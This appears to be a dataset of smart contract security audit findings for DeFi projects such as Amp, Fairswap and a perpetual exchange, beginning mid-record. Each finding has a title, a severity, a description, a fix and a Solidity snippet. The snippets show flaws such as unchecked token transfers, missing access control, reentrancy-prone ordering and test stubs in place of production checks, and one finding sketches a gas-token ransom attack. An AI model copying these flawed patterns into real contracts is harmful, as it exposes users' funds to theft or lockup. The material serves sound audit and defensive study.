commented out code or transform it into comments.чч```\\nfunction viewRawAmount (address \\_assim, int128 \\_amt) internal returns (uint256 amount\\_) {\\n\\n // amount\\_ = IAssimilator(\\_assim).viewRawAmount(\\_amt); // for production\\n\\n bytes memory data = abi.encodeWithSelector(iAsmltr.viewRawAmount.selector, \\_amt.abs()); // for development\\n\\n amount\\_ = abi.decode(\\_assim.delegate(data), (uint256)); // for development\\n\\n}\\n```\\n -Should check if the asset already exists when adding a new assetчmediumчThe public function `includeAsset`\\n```\\nfunction includeAsset (address \\_numeraire, address \\_nAssim, address \\_reserve, address \\_rAssim, uint256 \\_weight) public onlyOwner {\\n shell.includeAsset(\\_numeraire, \\_nAssim, \\_reserve, \\_rAssim, \\_weight);\\n}\\n```\\n\\nCalls the internal `includeAsset` implementation\\n```\\nfunction includeAsset (Shells.Shell storage shell, address \\_numeraire, address \\_numeraireAssim, address \\_reserve, address \\_reserveAssim, uint256 \\_weight) internal {\\n```\\n\\nBut there is no check to see if the asset already exists in the list. 
Because the check was not done, `shell.numeraires` can contain multiple identical instances.\\n```\\nshell.numeraires.push(\\_numeraireAssimilator);\\n```\\nчCheck if the `_numeraire` already exists before invoking `includeAsset`.чч```\\nfunction includeAsset (address \\_numeraire, address \\_nAssim, address \\_reserve, address \\_rAssim, uint256 \\_weight) public onlyOwner {\\n shell.includeAsset(\\_numeraire, \\_nAssim, \\_reserve, \\_rAssim, \\_weight);\\n}\\n```\\n -Check return values for both internal and external callsчlowчThere are some cases where functions which return values are called throughout the source code but the return values are not processed, nor checked.\\nThe returns should in principle be handled and checked for validity to provide more robustness to the code.\\nThe function `intakeNumeraire` receives a number of tokens and returns how many tokens were transferred to the contract.\\n```\\n// transfers numeraire amount of dai in, wraps it in cDai, returns raw amount\\nfunction intakeNumeraire (int128 \\_amount) public returns (uint256 amount\\_) {\\n\\n // truncate stray decimals caused by conversion\\n amount\\_ = \\_amount.mulu(1e18) / 1e3 \\* 1e3;\\n\\n dai.transferFrom(msg.sender, address(this), amount\\_);\\n\\n}\\n```\\n\\nSimilarly, the function `outputNumeraire` receives a destination address and an amount of token for withdrawal and returns a number of transferred tokens to the specified address.\\n```\\n// takes numeraire amount of dai, unwraps corresponding amount of cDai, transfers that out, returns numeraire amount\\nfunction outputNumeraire (address \\_dst, int128 \\_amount) public returns (uint256 amount\\_) {\\n\\n amount\\_ = \\_amount.mulu(1e18);\\n\\n dai.transfer(\\_dst, amount\\_);\\n\\n return amount\\_;\\n\\n}\\n```\\n\\nHowever, the results are not handled in the main 
contract.\\n```\\nshell.numeraires[i].addr.intakeNumeraire(\\_shells.mul(shell.weights[i]));\\n```\\n\\n```\\nshell.numeraires[i].addr.intakeNumeraire(\\_oBals[i].mul(\\_multiplier));\\n```\\n\\n```\\nshell.reserves[i].addr.outputNumeraire(msg.sender, \\_oBals[i].mul(\\_multiplier));\\n```\\n\\nA sanity check can be done to make sure that more than 0 tokens were transferred to the contract.\\n```\\nunit intakeAmount = shell.numeraires[i].addr.intakeNumeraire(\\_shells.mul(shell.weights[i]));\\nrequire(intakeAmount > 0, \"Must intake a positive number of tokens\");\\n```\\nчHandle all return values everywhere returns exist and add checks to make sure an expected value was returned.\\nIf the return values are never used, consider not returning them at all.чч```\\n// transfers numeraire amount of dai in, wraps it in cDai, returns raw amount\\nfunction intakeNumeraire (int128 \\_amount) public returns (uint256 amount\\_) {\\n\\n // truncate stray decimals caused by conversion\\n amount\\_ = \\_amount.mulu(1e18) / 1e3 \\* 1e3;\\n\\n dai.transferFrom(msg.sender, address(this), amount\\_);\\n\\n}\\n```\\n -Interfaces do not need to be implemented for the compiler to access their selectors.чlowч```\\nIAssimilator constant iAsmltr = IAssimilator(address(0));\\n```\\n\\nThis pattern is unneeded since you can reference selectors by using the imported interface directly without any implementation. 
It hinders both gas costs and readability of the code.ч```\\nbytes memory data = abi.encodeWithSelector(iAsmltr.viewNumeraireAmount.selector, \\_amt); // for development\\n```\\n\\nuse the expression:\\n`IAssimilator.viewRawAmount.selector`чч```\\nIAssimilator constant iAsmltr = IAssimilator(address(0));\\n```\\n -Use consistent interfaces for functions in the same groupчlowчThis library has 2 functions.\\n`add` which receives 2 arguments, `x` and `y`.\\n```\\nfunction add(uint x, uint y) internal pure returns (uint z) {\\n require((z = x + y) >= x, \"add-overflow\");\\n}\\n```\\n\\n`sub` which receives 3 arguments `x`, `y` and `_errorMessage`.\\n```\\nfunction sub(uint x, uint y, string memory \\_errorMessage) internal pure returns (uint z) {\\n require((z = x - y) <= x, \\_errorMessage);\\n}\\n```\\n\\nIn order to reduce the cognitive load on the auditors and developers alike, somehow-related functions should have coherent logic and interfaces. Both of the functions either need to have 2 arguments, with an implied error message passed to `require`, or both functions need to have 3 arguments, with an error message that can be specified.чUpdate the functions to be coherent with other related functions.чч```\\nfunction add(uint x, uint y) internal pure returns (uint z) {\\n require((z = x + y) >= x, \"add-overflow\");\\n}\\n```\\n -Consider emitting an event when changing the frozen state of the contractчlowчThe function `freeze` allows the owner to `freeze` and unfreeze the contract.\\n```\\nfunction freeze (bool \\_freeze) public onlyOwner {\\n frozen = \\_freeze;\\n}\\n```\\n\\nThe common pattern when doing actions important for the outside of the blockchain is to emit an event when the action is successful.\\nIt's probably a good idea to emit an event stating the contract was frozen or unfrozen.чCreate an event that displays the current state of the contract.\\n```\\nevent Frozen(bool frozen);\\n```\\n\\nAnd emit the event when `frozen` is 
called.\\n```\\nfunction freeze (bool \\_freeze) public onlyOwner {\\n frozen = \\_freeze;\\n emit Frozen(\\_freeze);\\n}\\n```\\nчч```\\nfunction freeze (bool \\_freeze) public onlyOwner {\\n frozen = \\_freeze;\\n}\\n```\\n -Function supportsInterface can be restricted to pureчlowчThe function `supportsInterface` returns a `bool` stating that the contract supports one of the defined interfaces.\\n```\\nfunction supportsInterface (bytes4 interfaceID) public returns (bool) {\\n return interfaceID == ERC20ID || interfaceID == ERC165ID;\\n}\\n```\\n\\nThe function does not access or change the state of the contract, this is why it can be restricted to `pure`.чRestrict the function definition to `pure`.\\n```\\nfunction supportsInterface (bytes4 interfaceID) public pure returns (bool) {\\n```\\nчч```\\nfunction supportsInterface (bytes4 interfaceID) public returns (bool) {\\n return interfaceID == ERC20ID || interfaceID == ERC165ID;\\n}\\n```\\n -Use more consistent function naming (includeAssimilator / excludeAdapter)чlowчThe function `includeAssimilator` adds a new assimilator to the list\\n```\\nshell.assimilators[\\_derivative] = Assimilators.Assimilator(\\_assimilator, \\_numeraireAssim.ix);\\n```\\n\\nThe function `excludeAdapter` removes the specified assimilator from the list\\n```\\ndelete shell.assimilators[\\_assimilator];\\n```\\nчConsider renaming the function `excludeAdapter` to `removeAssimilator` and moving the logic of adding and removing in the same source file.чч```\\nshell.assimilators[\\_derivative] = Assimilators.Assimilator(\\_assimilator, \\_numeraireAssim.ix);\\n```\\n -Eliminate assembly code by using ABI decodeчhighчThere are several locations where assembly code is used to access and decode byte arrays (including uses inside loops). 
Even though assembly code was used for gas optimization, it reduces the readability (and future updatability) of the code.\\n```\\nassembly {\\n flag := mload(add(\\_data, 32))\\n}\\nif (flag == CHANGE\\_PARTITION\\_FLAG) {\\n assembly {\\n toPartition := mload(add(\\_data, 64))\\n```\\n\\n```\\nassembly {\\n toPartition := mload(add(\\_data, 64))\\n```\\n\\n```\\nfor (uint256 i = 116; i <= \\_operatorData.length; i = i + 32) {\\n bytes32 temp;\\n assembly {\\n temp := mload(add(\\_operatorData, i))\\n }\\n proof[index] = temp;\\n index++;\\n}\\n```\\nчAs discussed in the mid-audit meeting, it is a good solution to use ABI decode since all uses of assembly simply access 32-byte chunks of data from user input. This should eliminate all assembly code and make the code significantly more clean. In addition, it might allow for more compact encoding in some cases (for instance, by eliminating or reducing the size of the flags).\\nThis suggestion can be also applied to Merkle Root verifications/calculation code, which can reduce the for loops and complexity of these functions.чч```\\nassembly {\\n flag := mload(add(\\_data, 32))\\n}\\nif (flag == CHANGE\\_PARTITION\\_FLAG) {\\n assembly {\\n toPartition := mload(add(\\_data, 64))\\n```\\n -Ignored return value for transferFrom callчhighчWhen burning swap tokens the return value of the `transferFrom` call is ignored. Depending on the token's implementation this could allow an attacker to mint an arbitrary amount of Amp tokens.\\nNote that the severity of this issue could have been Critical if Flexa token was any arbitrarily tokens. 
We quickly verified that Flexa token implementation would revert if the amount exceeds the allowance, however it might not be the case for other token implementations.\\n```\\nswapToken.transferFrom(\\_from, swapTokenGraveyard, amount);\\n```\\nчThe code should be changed like this:\\n```\\nrequire(swapToken.transferFrom(_from, swapTokenGraveyard, amount));\\n```\\nчч```\\nswapToken.transferFrom(\\_from, swapTokenGraveyard, amount);\\n```\\n -Potentially insufficient validation for operator transfersчmediumчFor operator transfers, the current validation does not require the sender to be an operator (as long as the transferred value does not exceed the allowance):\\n```\\nrequire(\\n \\_isOperatorForPartition(\\_partition, msg.sender, \\_from) ||\\n (\\_value <= \\_allowedByPartition[\\_partition][\\_from][msg.sender]),\\n EC\\_53\\_INSUFFICIENT\\_ALLOWANCE\\n);\\n```\\n\\nIt is unclear if this is the intention `or` whether the logical `or` should be a logical `and`.чResolution\\nremoving `operatorTransferByPartition` and simplifying the interfaces to only `tranferByPartition`\\nThis removes the existing tranferByPartition, converting operatorTransferByPartition to it. The reason for this is to make the client interface simpler, where there is one method to transfer by partition, and that method can be called by either a sender wanting to transfer from their own address, or an operator wanting to transfer from a different token holder address. We found that it was redundant to have multiple methods, and the client convenience wasn't worth the confusion.\\nConfirm that the code matches the intention. 
If so, consider documenting the behavior (for instance, by changing the name of function `operatorTransferByPartition`).чч```\\nrequire(\\n \\_isOperatorForPartition(\\_partition, msg.sender, \\_from) ||\\n (\\_value <= \\_allowedByPartition[\\_partition][\\_from][msg.sender]),\\n EC\\_53\\_INSUFFICIENT\\_ALLOWANCE\\n);\\n```\\n -Potentially missing nonce check AcknowledgedчmediumчWhen executing withdrawals in the collateral manager the per-address withdrawal nonce is simply updated without checking that the new nonce is one greater than the previous one (see Examples). It seems like without such a check it might be easy to make mistakes and cause issues with ordering of withdrawals.\\n```\\naddressToWithdrawalNonce[\\_partition][supplier] = withdrawalRootNonce;\\n```\\n\\n```\\naddressToWithdrawalNonce[\\_partition][supplier] = maxWithdrawalRootNonce;\\n```\\n\\n```\\nmaxWithdrawalRootNonce = \\_nonce;\\n```\\nчConsider adding more validation and sanity checks for nonces on per-address withdrawals.чч```\\naddressToWithdrawalNonce[\\_partition][supplier] = withdrawalRootNonce;\\n```\\n -Unbounded loop when validating Merkle proofsчmediumчIt seems like the loop for validating Merkle proofs is unbounded. If possible it would be good to have an upper bound to prevent DoS-like attacks. It seems like the depth of the tree, and thus, the length of the proof could be bounded.\\nThis could also simplify the decoding and make it more robust. For instance, in `_decodeWithdrawalOperatorData` it is unclear what happens if the data length is not a multiple of 32. 
It seems like it might result in out-of-bound reads.\\n```\\nuint256 proofNb = (\\_operatorData.length - 84) / 32;\\nbytes32[] memory proof = new bytes32[](proofNb);\\nuint256 index = 0;\\nfor (uint256 i = 116; i <= \\_operatorData.length; i = i + 32) {\\n bytes32 temp;\\n assembly {\\n temp := mload(add(\\_operatorData, i))\\n }\\n proof[index] = temp;\\n index++;\\n}\\n```\\nчConsider enforcing a bound on the length of Merkle proofs.\\nAlso note that if similar mitigation method as issue 5.1 is used, this method can be replaced by a simpler function using ABI Decode, which does not have any unbounded issues as the sizes of the hashes are fixed (or can be indicated in the passed objects)чч```\\nuint256 proofNb = (\\_operatorData.length - 84) / 32;\\nbytes32[] memory proof = new bytes32[](proofNb);\\nuint256 index = 0;\\nfor (uint256 i = 116; i <= \\_operatorData.length; i = i + 32) {\\n bytes32 temp;\\n assembly {\\n temp := mload(add(\\_operatorData, i))\\n }\\n proof[index] = temp;\\n index++;\\n}\\n```\\n -Mitigation for possible reentrancy in token transfersчmediumчERC777 adds significant features to the token implementation, however there are some known risks associated with this token, such as possible reentrancy attack vector. Given that the Amp token uses hooks to communicate to Collateral manager, it seems that the environment is trusted and safe. 
However, a minor modification to the implementation can result in safer implementation of the token transfer.\\n```\\nrequire(\\n \\_balanceOfByPartition[\\_from][\\_fromPartition] >= \\_value,\\n EC\\_52\\_INSUFFICIENT\\_BALANCE\\n);\\n\\nbytes32 toPartition = \\_fromPartition;\\nif (\\_data.length >= 64) {\\n toPartition = \\_getDestinationPartition(\\_fromPartition, \\_data);\\n}\\n\\n\\_callPreTransferHooks(\\n \\_fromPartition,\\n \\_operator,\\n \\_from,\\n \\_to,\\n \\_value,\\n \\_data,\\n \\_operatorData\\n);\\n\\n\\_removeTokenFromPartition(\\_from, \\_fromPartition, \\_value);\\n\\_transfer(\\_from, \\_to, \\_value);\\n\\_addTokenToPartition(\\_to, toPartition, \\_value);\\n\\n\\_callPostTransferHooks(\\n toPartition,\\n```\\nчIt is suggested to move any condition check that is checking the balance to after the external call. However `_callPostTransferHooks` needs to be called after the state changes, so the suggested mitigation here is to move the require at line 1152 to after `_callPreTransferHooks()` function (e.g. 
line 1171).чч```\\nrequire(\\n \\_balanceOfByPartition[\\_from][\\_fromPartition] >= \\_value,\\n EC\\_52\\_INSUFFICIENT\\_BALANCE\\n);\\n\\nbytes32 toPartition = \\_fromPartition;\\nif (\\_data.length >= 64) {\\n toPartition = \\_getDestinationPartition(\\_fromPartition, \\_data);\\n}\\n\\n\\_callPreTransferHooks(\\n \\_fromPartition,\\n \\_operator,\\n \\_from,\\n \\_to,\\n \\_value,\\n \\_data,\\n \\_operatorData\\n);\\n\\n\\_removeTokenFromPartition(\\_from, \\_fromPartition, \\_value);\\n\\_transfer(\\_from, \\_to, \\_value);\\n\\_addTokenToPartition(\\_to, toPartition, \\_value);\\n\\n\\_callPostTransferHooks(\\n toPartition,\\n```\\n -Potentially inconsistent input validationчmediumчThere are some functions that might require additional input validation (similar to other functions):\\nAmp.transferWithData: `require(_isOperator(msg.sender, _from), EC_58_INVALID_OPERATOR);` like in\\n```\\nrequire(\\_isOperator(msg.sender, \\_from), EC\\_58\\_INVALID\\_OPERATOR);\\n```\\n\\nAmp.authorizeOperatorByPartition: `require(_operator != msg.sender);` like in\\n```\\nrequire(\\_operator != msg.sender);\\n```\\n\\nAmp.revokeOperatorByPartition: `require(_operator != msg.sender);` like in\\n```\\nrequire(\\_operator != msg.sender);\\n```\\nчConsider adding additional input validation.чч```\\nrequire(\\_isOperator(msg.sender, \\_from), EC\\_58\\_INVALID\\_OPERATOR);\\n```\\n -ERC20 compatibility of Amp token using defaultPartitionчmediumчIt is somewhat unclear how the Amp token ensures ERC20 compatibility. While the `default` partition is used in some places (for instance, in function balanceOf) there are also separate fields for (aggregated) balances/allowances. 
This seems to introduce some redundancy and raises certain questions about when which fields are relevant.\\n`_allowed` is used in function `allowance` instead of `_allowedByPartition` with the default partition\\nAn `Approval` event should be emitted when approving the default partition\\n```\\nemit ApprovalByPartition(\\_partition, \\_tokenHolder, \\_spender, \\_amount);\\n```\\n\\n`increaseAllowance()` vs. `increaseAllowanceByPartition()`чAfter the mid-audit discussion, it was clear that the general `balanceOf` method (with no partition) is not needed and can be replaced with a `balanceOf` function that returns balance of the default partition, similarly for allowance, the general `increaseAllowance` function can simply call `increaseAllowanceByPartition` using default partition (same for decreaseAllowance).чч```\\nemit ApprovalByPartition(\\_partition, \\_tokenHolder, \\_spender, \\_amount);\\n```\\n -Additional validation for canReceiveчlowчFor `FlexaCollateralManager.tokensReceived` there is validation to ensure that only the Amp calls the function. 
In contrast, there is no such validation for `canReceive` and it is unclear if this is the intention.\\n```\\nrequire(msg.sender == amp, \"Invalid sender\");\\n```\\nчConsider adding a conjunct `msg.sender == amp` in function `_canReceive`.\\n```\\nfunction \\_canReceive(address \\_to, bytes32 \\_destinationPartition) internal view returns (bool) {\\n return \\_to == address(this) && partitions[\\_destinationPartition];\\n}\\n```\\nчч```\\nrequire(msg.sender == amp, \"Invalid sender\");\\n```\\n -Discrepancy between code and commentsчlowчThere are some discrepancies between (uncommented) code and the documentations comment:\\n```\\n// Indicate token verifies Amp, ERC777 and ERC20 interfaces\\nERC1820Implementer.\\_setInterface(AMP\\_INTERFACE\\_NAME);\\nERC1820Implementer.\\_setInterface(ERC20\\_INTERFACE\\_NAME);\\n// ERC1820Implementer.\\_setInterface(ERC777\\_INTERFACE\\_NAME);\\n```\\n\\n```\\n/\\*\\*\\n \\* @notice Indicates a supply refund was executed\\n \\* @param supplier Address whose refund authorization was executed\\n \\* @param partition Partition from which the tokens were transferred\\n \\* @param amount Amount of tokens transferred\\n \\*/\\nevent SupplyRefund(\\n address indexed supplier,\\n bytes32 indexed partition,\\n uint256 amount,\\n uint256 indexed nonce\\n);\\n```\\nчConsider updating either the code or the comment.чч```\\n// Indicate token verifies Amp, ERC777 and ERC20 interfaces\\nERC1820Implementer.\\_setInterface(AMP\\_INTERFACE\\_NAME);\\nERC1820Implementer.\\_setInterface(ERC20\\_INTERFACE\\_NAME);\\n// ERC1820Implementer.\\_setInterface(ERC777\\_INTERFACE\\_NAME);\\n```\\n -Several fields could potentially be private AcknowledgedчlowчSeveral fields in `Amp` could possibly be private:\\nswapToken:\\n```\\nISwapToken public swapToken;\\n```\\n\\nswapTokenGraveyard:\\n```\\naddress public constant swapTokenGraveyard = 0x000000000000000000000000000000000000dEaD;\\n```\\n\\ncollateralManagers:\\n```\\naddress[] public 
collateralManagers;\\n```\\n\\npartitionStrategies:\\n```\\nbytes4[] public partitionStrategies;\\n```\\n\\nThe same holds for several fields in `FlexaCollateralManager`. For instance:\\npartitions:\\n```\\nmapping(bytes32 => bool) public partitions;\\n```\\n\\nnonceToSupply:\\n```\\nmapping(uint256 => Supply) public nonceToSupply;\\n```\\n\\nwithdrawalRootToNonce:\\n```\\nmapping(bytes32 => uint256) public withdrawalRootToNonce;\\n```\\nчDouble-check that you really want to expose those fields.чч```\\nISwapToken public swapToken;\\n```\\n -Several fields could be declared immutable AcknowledgedчlowчSeveral fields could be declared immutable to make clear that they never change after construction:\\nAmp._name:\\n```\\nstring internal \\_name;\\n```\\n\\nAmp._symbol:\\n```\\nstring internal \\_symbol;\\n```\\n\\nAmp.swapToken:\\n```\\nISwapToken public swapToken;\\n```\\n\\nFlexaCollateralManager.amp:\\n```\\naddress public amp;\\n```\\nчUse the `immutable` annotation in Solidity (see Immutable).чч```\\nstring internal \\_name;\\n```\\n -A reverting fallback function will lock up all payoutsчhighч```\\nfunction \\_transferETH(address \\_recipient, uint256 \\_amount) private {\\n (bool success, ) = \\_recipient.call{value: \\_amount}(\\n abi.encodeWithSignature(\"\")\\n );\\n require(success, \"Transfer Failed\");\\n}\\n```\\n\\nThe `_payment()` function processes a list of transfers to settle the transactions in an `ExchangeBox`. 
If any of the recipients of an Eth transfer is a smart contract that reverts, then the entire payout will fail and will be unrecoverable.чImplement a queuing mechanism to allow buyers/sellers to initiate the withdrawal on their own using a ‘pull-over-push pattern.'\\nIgnore a failed transfer and leave the responsibility up to users to receive them properly.чч```\\nfunction \\_transferETH(address \\_recipient, uint256 \\_amount) private {\\n (bool success, ) = \\_recipient.call{value: \\_amount}(\\n abi.encodeWithSignature(\"\")\\n );\\n require(success, \"Transfer Failed\");\\n}\\n```\\n -Force traders to mint gas tokenчhighчAttack scenario:\\nAlice makes a large trade via the Fairswap_iDOLvsEth exchange. This will tie up her iDOL until the box is executed.\\nMallory makes a small trades to buy ETH immediately afterwards, the trades are routed through an attack contract.\\nAlice needs to execute the box to get her iDOL out.\\nBecause the gas amount is unlimited, when you Mallory's ETH is paid out to her attack contract, mint a lot of GasToken.\\nIf Alice has $100 worth of ETH tied up in the exchange, you can basically ransom her for $99 of gas token or else she'll never see her funds again.\\n```\\nfunction \\_transferETH(address \\_recipient, uint256 \\_amount) private {\\n```\\nчWhen sending ETH, a pull-payment model is generally preferable.\\nThis would require setting up a queue, allowing users to call a function to initiate a withdrawal.чч```\\nfunction \\_transferETH(address \\_recipient, uint256 \\_amount) private {\\n```\\n -Missing Proper Access ControlчhighчSome functions do not have proper access control and are `public`, meaning that anyone can call them. 
This will result in system take over depending on how critical those functionalities are.\\n```\\n \\*/\\nfunction setIDOLContract(address contractAddress) public {\\n require(address(\\_IDOLContract) == address(0), \"IDOL contract is already registered\");\\n \\_setStableCoinContract(contractAddress);\\n}\\n```\\nчMake the `setIDOLContract()` function `internal` and call it from the constructor, or only allow the `deployer` to set the value.чч```\\n \\*/\\nfunction setIDOLContract(address contractAddress) public {\\n require(address(\\_IDOLContract) == address(0), \"IDOL contract is already registered\");\\n \\_setStableCoinContract(contractAddress);\\n}\\n```\\n -Code is not production-readyчhighчSimilar to other discussed issues, several areas of the code suggest that the system is not production-ready. This results in narrow test scenarios that do not cover production code flow.\\nisNotStartedAuction\\ninAcceptingBidsPeriod\\ninRevealingValuationPeriod\\ninReceivingBidsPeriod\\n```\\n/\\*\\n// Indicates any auction has never held for a specified BondID\\nfunction isNotStartedAuction(bytes32 auctionID) public virtual override returns (bool) {\\n uint256 closingTime = \\_auctionClosingTime[auctionID];\\n return closingTime == 0;\\n}\\n\\n// Indicates if the auctionID is in bid acceptance status\\nfunction inAcceptingBidsPeriod(bytes32 auctionID) public virtual override returns (bool) {\\n uint256 closingTime = \\_auctionClosingTime[auctionID];\\n```\\n\\n```\\n// TEST\\nfunction isNotStartedAuction(bytes32 auctionID)\\n public\\n virtual\\n override\\n returns (bool)\\n{\\n return true;\\n}\\n\\n// TEST\\nfunction inAcceptingBidsPeriod(bytes32 auctionID)\\n```\\n\\nThese commented-out functions contain essential functionality for the Auction contract. 
For example, `inRevealingValuationPeriod` is used to allow revealing of the bid price publicly:\\n```\\nrequire(\\n inRevealingValuationPeriod(auctionID),\\n \"it is not the time to reveal the value of bids\"\\n);\\n```\\nчRemove the test functions and use the production code for testing. The tests must have full coverage of the production code to be considered complete.чч```\\n/\\*\\n// Indicates any auction has never held for a specified BondID\\nfunction isNotStartedAuction(bytes32 auctionID) public virtual override returns (bool) {\\n uint256 closingTime = \\_auctionClosingTime[auctionID];\\n return closingTime == 0;\\n}\\n\\n// Indicates if the auctionID is in bid acceptance status\\nfunction inAcceptingBidsPeriod(bytes32 auctionID) public virtual override returns (bool) {\\n uint256 closingTime = \\_auctionClosingTime[auctionID];\\n```\\n -Unreachable code due to checked conditionsчmediumч```\\nfunction revealBid(\\n bytes32 auctionID,\\n uint256 price,\\n uint256 targetSBTAmount,\\n uint256 random\\n) public override {\\n require(\\n inRevealingValuationPeriod(auctionID),\\n \"it is not the time to reveal the value of bids\"\\n );\\n```\\n\\nHowever, later in the same function, code exists to introduce “Penalties for revealing too early.” This checks to see if the function was called before closing, which should not be possible given the previous check.\\n```\\n/\\*\\*\\n \\* @dev Penalties for revealing too early.\\n \\* Some participants may not follow the rule and publicate their bid information before the reveal process.\\n \\* In such a case, the bid price is overwritten by the bid with the strike price (slightly unfavored price).\\n \\*/\\nuint256 bidPrice = price;\\n\\n/\\*\\*\\n \\* @dev FOR TEST CODE RUNNING: The following if statement in L533 should be replaced by the comment out\\n \\*/\\nif (inAcceptingBidsPeriod(auctionID)) {\\n // if (false) {\\n (, , uint256 solidStrikePriceE4, ) = \\_getBondFromAuctionID(auctionID);\\n bidPrice = 
\\_exchangeSBT2IDOL(solidStrikePriceE4.mul(10\\*\\*18));\\n}\\n```\\nчResolution\\nComment from Lien Protocol:\\nDouble-check the logic in these functions. If revealing should be allowed (but penalized in the earlier stage), the first check should be changed. However, based on our understanding, the first check is correct, and the second check for early reveal is redundant and should be removed.чч```\\nfunction revealBid(\\n bytes32 auctionID,\\n uint256 price,\\n uint256 targetSBTAmount,\\n uint256 random\\n) public override {\\n require(\\n inRevealingValuationPeriod(auctionID),\\n \"it is not the time to reveal the value of bids\"\\n );\\n```\\n -Fairswap: inconsistent checks on _executionOrder()чlowчThe `_executionOrder()` function should only be called under specific conditions. However, these conditions are not always consistently defined.\\n```\\nif (nextBoxNumber > 1 && nextBoxNumber > nextExecuteBoxNumber) {\\n```\\n\\n```\\nif (nextBoxNumber > 1 && nextBoxNumber > nextExecuteBoxNumber) {\\n```\\n\\n```\\nif (nextBoxNumber > 1 && nextBoxNumber >= nextExecuteBoxNumber) {\\n```\\nчResolution\\nComment from Lien Protocol:\\nReduce duplicate code by defining an internal function to perform this check. 
A clear, descriptive name will help to clarify the intention.чч```\\nif (nextBoxNumber > 1 && nextBoxNumber > nextExecuteBoxNumber) {\\n```\\n -Inconsistency in DecimalSafeMath implementationsчlowчThere are two different implementations of `DecimalSafeMath` in the 3 FairSwap repositories.\\n```\\nlibrary DecimalSafeMath {\\n function decimalDiv(uint256 a, uint256 b)internal pure returns (uint256) {\\n // assert(b > 0); // Solidity automatically throws when dividing by 0\\n uint256 a\\_ = a \\* 1000000000000000000;\\n uint256 c = a\\_ / b;\\n // assert(a == b \\* c + a % b); // There is no case in which this doesn't hold\\n return c;\\n }\\n```\\n\\n```\\nlibrary DecimalSafeMath {\\n\\n function decimalDiv(uint256 a, uint256 b)internal pure returns (uint256) {\\n // assert(b > 0); // Solidity automatically throws when dividing by 0\\n \\n uint256 c = (a \\* 1000000000000000000) / b;\\n // assert(a == b \\* c + a % b); // There is no case in which this doesn't hold\\n return c;\\n }\\n```\\nчTry removing duplicate code/libraries and using a better inheritance model to include one file in all FairSwaps.чч```\\nlibrary DecimalSafeMath {\\n function decimalDiv(uint256 a, uint256 b)internal pure returns (uint256) {\\n // assert(b > 0); // Solidity automatically throws when dividing by 0\\n uint256 a\\_ = a \\* 1000000000000000000;\\n uint256 c = a\\_ / b;\\n // assert(a == b \\* c + a % b); // There is no case in which this doesn't hold\\n return c;\\n }\\n```\\n -Exchange - CancelOrder has no effect PendingчhighчThe exchange provides means for the `trader` or `broker` to cancel the order. The `cancelOrder` method, however, only stores the hash of the canceled order in mapping but the mapping is never checked. 
It is therefore effectively impossible for a `trader` to cancel an order.\\n```\\nfunction cancelOrder(LibOrder.Order memory order) public {\\n require(msg.sender == order.trader || msg.sender == order.broker, \"invalid caller\");\\n\\n bytes32 orderHash = order.getOrderHash();\\n cancelled[orderHash] = true;\\n\\n emit Cancel(orderHash);\\n}\\n```\\nч`matchOrders*` or `validateOrderParam` should check if `cancelled[orderHash] == true` and abort fulfilling the order.\\nVerify the order params (Signature) before accepting it as canceled.чч```\\nfunction cancelOrder(LibOrder.Order memory order) public {\\n require(msg.sender == order.trader || msg.sender == order.broker, \"invalid caller\");\\n\\n bytes32 orderHash = order.getOrderHash();\\n cancelled[orderHash] = true;\\n\\n emit Cancel(orderHash);\\n}\\n```\\n -Perpetual - withdraw should only be available in NORMAL state PendingчhighчAccording to the specification `withdraw` can only be called in `NORMAL` state. However, the implementation allows it to be called in `NORMAL` and `SETTLED` mode.\\nWithdraw only checks for `!SETTLING` state which resolves to `NORMAL` and `SETTLED`.\\n```\\nfunction withdraw(uint256 amount) public {\\n withdrawFromAccount(msg.sender, amount);\\n}\\n```\\n\\n```\\nfunction withdrawFromAccount(address payable guy, uint256 amount) private {\\n require(guy != address(0), \"invalid guy\");\\n require(status != LibTypes.Status.SETTLING, \"wrong perpetual status\");\\n\\n uint256 currentMarkPrice = markPrice();\\n require(isSafeWithPrice(guy, currentMarkPrice), \"unsafe before withdraw\");\\n remargin(guy, currentMarkPrice);\\n address broker = currentBroker(guy);\\n bool forced = broker == address(amm.perpetualProxy()) || broker == address(0);\\n withdraw(guy, amount, forced);\\n\\n require(isSafeWithPrice(guy, currentMarkPrice), \"unsafe after withdraw\");\\n require(availableMarginWithPrice(guy, currentMarkPrice) >= 0, \"withdraw margin\");\\n}\\n```\\n\\nIn contrast, `withdrawFor` 
requires the state to be NORMAL:\\n```\\nfunction withdrawFor(address payable guy, uint256 amount) public onlyWhitelisted {\\n require(status == LibTypes.Status.NORMAL, \"wrong perpetual status\");\\n withdrawFromAccount(guy, amount);\\n}\\n```\\nчResolution\\nThis issue was resolved by requiring `status == LibTypes.Status.NORMAL`.\\n`withdraw` should only be available in the `NORMAL` operation mode.чч```\\nfunction withdraw(uint256 amount) public {\\n withdrawFromAccount(msg.sender, amount);\\n}\\n```\\n -Perpetual - withdrawFromInsuranceFund should check wadAmount instead of rawAmount Pendingчhighч`withdrawFromInsurance` checks that enough funds are in the insurance fund before allowing withdrawal by an admin by checking the provided `rawAmount` <= insuranceFundBalance.toUint256(). `rawAmount` is the `ETH` (18 digit precision) or collateral token amount (can be less than 18 digit precision) to be withdrawn while `insuranceFundBalance` is a WAD-denominated value (18 digit precision).\\nThe check does not hold if the configured collateral has different precision and may have unwanted consequences, e.g. the withdrawal of more funds than expected.\\nNote: there is another check for `insuranceFundBalance` staying positive after the potential external call to collateral.\\n```\\nfunction withdrawFromInsuranceFund(uint256 rawAmount) public onlyWhitelistAdmin {\\n require(rawAmount > 0, \"invalid amount\");\\n require(insuranceFundBalance > 0, \"insufficient funds\");\\n require(rawAmount <= insuranceFundBalance.toUint256(), \"insufficient funds\");\\n\\n int256 wadAmount = toWad(rawAmount);\\n insuranceFundBalance = insuranceFundBalance.sub(wadAmount);\\n withdrawFromProtocol(msg.sender, rawAmount);\\n\\n require(insuranceFundBalance >= 0, \"negtive insurance fund\");\\n\\n emit UpdateInsuranceFund(insuranceFundBalance);\\n}\\n```\\n\\nWhen looking at the test-cases there seems to be a misconception about what unit of amount `withdrawFromInsuranceFund` is taking. 
